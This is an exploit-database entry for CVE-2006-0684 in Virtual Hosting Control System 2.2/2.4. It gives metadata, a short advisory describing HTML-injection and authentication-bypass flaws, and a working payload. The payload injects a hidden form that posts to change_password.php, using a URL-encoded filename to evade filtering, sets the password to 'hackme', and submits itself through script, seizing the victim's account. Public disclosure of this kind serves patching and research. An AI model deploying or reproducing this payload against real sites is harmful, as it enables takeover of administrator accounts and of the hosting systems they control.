[] NeoSense

Virtual Hosting Control System 2.2/2.4 - 'change_password.php' Current Password

Author: Roman Medina-Heigl Hernandez
type: webapps
platform: php
port: 
date_added: 2006-02-13 
date_updated: 2013-07-30 
verified: 1 
codes: CVE-2006-0684;OSVDB-23107 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/16600/info

Virtual Hosting Control System (VHCS) is prone to multiple input and access vulnerabilities.

VHCS is prone to an HTML-injection vulnerability and an authentication-bypass vulnerability. These issues could be exploited to gain administrative access to the application; other attacks are also possible.

</form><form name="dsr" method="post" action="ch%61nge_password.php"><input name="pass" value="hackme"><input name="pass_rep" value="hackme"><input name="uaction" value="updt_pass"></form><script>document.dsr.submit()</script>